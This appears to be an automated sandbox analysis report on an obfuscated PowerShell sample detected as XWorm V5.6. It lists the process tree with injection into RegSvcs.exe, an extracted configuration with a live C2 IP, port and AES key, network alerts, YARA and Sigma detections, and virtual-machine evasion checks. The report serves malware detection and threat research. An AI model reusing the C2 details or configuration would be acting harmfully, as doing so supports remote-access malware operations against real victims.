Windows Analysis Report
QP2uO3eN2p.ps1

Overview

General Information

Sample name: QP2uO3eN2p.ps1 (renamed because original name is a hash value)
Original sample name: 7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b.ps1
Analysis ID: 1577167
MD5: 6d71ada719b48d770647e3e703cbbcfd
SHA1: bc2dd183895888c20057f165d3332e8ecf6a6ada
SHA256: 7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b
Tags: 92-255-57-155, ps1, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 5968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 5944 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 1056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 2272 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wermgr.exe (PID: 6780 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
    00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0x1d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x1dd8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x9fe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1e68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xa108:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x1c20:$cnc4: POST / HTTP/1.1
    Process Memory Space: RegSvcs.exe PID: 1056 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
      Process Memory Space: RegSvcs.exe PID: 1056 | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      • 0x2654a:$s8: Win32_ComputerSystem
      • 0x265b7:$s8: Win32_ComputerSystem
      • 0x28beb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x28ca7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x28d31:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x28ab9:$cnc4: POST / HTTP/1.1

      System Summary

      Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", ProcessId: 5968, ProcessName: powershell.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", ProcessId: 5968, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-18T08:17:50.319790+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.464309+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.511018+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.849597+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.014208+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.141800+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.325980+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.624952+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.971915+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:53.042473+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:53.277222+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:53.444801+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:54.639300+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:55.248426+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:55.625013+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:55.913635+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.104662+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.234945+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.335800+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.570069+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.717128+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:57.998586+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:58.237203+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:58.429825+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:58.663864+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:59.260084+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:59.549193+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:59.967979+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:18:00.158963+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:18:00.324751+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:18:00.350050+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-18T08:15:58.442835+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.8 | 49708 | TCP
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-18T08:16:39.278761+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49708 | 92.255.57.155 | 4411 | TCP

      AV Detection

      Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
      Source: QP2uO3eN2p.ps1, ReversingLabs: Detection: 23%
      Source: QP2uO3eN2p.ps1, Virustotal: Detection: 28%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

      Networking

      Source: Network traffic, Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Network traffic, Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.8:49708
      Source: Network traffic, Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Network traffic, Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.8:49708
      Source: Network traffic, Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Malware configuration extractor, URLs: 92.255.57.155
      Source: global traffic, TCP traffic: 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Joe Sandbox View, ASN Name: TELSPRU TELSPRU
      Source: unknown, TCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: powershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.0.dr, String found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70CA36000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window created: window name: CLIPBRDWNDCLASS

      System Summary

      Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
      Source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTR, Matched rule: Detects AsyncRAT, Author: ditekSHen
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Process Stats: CPU usage > 49%
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876
      Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTR, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.cs, Cryptographic APIs: 'CreateDecryptor'
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.cs, Cryptographic APIs: 'TransformFinalBlock'
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.cs, Cryptographic APIs: 'TransformFinalBlock'
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.cs, Cryptographic APIs: 'CreateDecryptor'
      Source: powershell.exe, 00000000.00000002.1672895709.000001E7098B5000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: ;.VBP
      Source: classification engine, Classification label: mal100.troj.evad.winPS1@9/14@0/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Mutant created: NULL
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Mutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
      Source: C:\Windows\System32\wermgr.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1056
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_raxan3yr.n0w.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb$3 source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdbMZ@ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1673465265.000001E70CD29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1697055181.000001E723A60000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3150292171.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: ?;oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.pdbMZ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: %%.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbj- source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3163033703.00000000053A1000.00000004.00000020.00020000.00000000.sdmp, WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.pdb@ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Drawing.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: mscorlib.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.pdbH source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: @;o.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: HP/o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp

      Data Obfuscation

      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.cs.Net Code: _202B_200C_206B_202B_200F_202E_206A_206B_206F_206A_206F_206D_206B_206B_202B_202E_200B_200D_206C_202C_200E_200C_206B_202B_200C_200E_202E_200B_202A_200D_200C_206E_200B_206E_206E_202A_200B_206D_202A_202C_202E System.AppDomain.Load(byte[])
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -Module-.cs.Net Code: _202B_202D_200B_200C_202A_206F_206C_206C_200E_200E_202C_206B_200B_200E_202B_202B_200B_206B_200E_206D_206C_202B_200C_206F_206C_202A_200F_206F_206F_202D_206C_206A_206B_206E_202A_200C_202E_206A_200D_200F_202E System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFB4B06E83C push esp; ret 0_2_00007FFB4B06E842

      Persistence and Installation Behavior

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe System information queried: FirmwareTableInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4473
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5403
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 5856
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 3963
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160 Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation
      Source: Amcache.hve.0.dr Binary or memory string: VMware
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin
      Source: Amcache.hve.0.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
      Source: Amcache.hve.0.dr Binary or memory string: VMware20,1hbin@
      Source: Amcache.hve.0.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.0.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.0.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: RegSvcs.exe, 00000004.00000002.3150292171.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
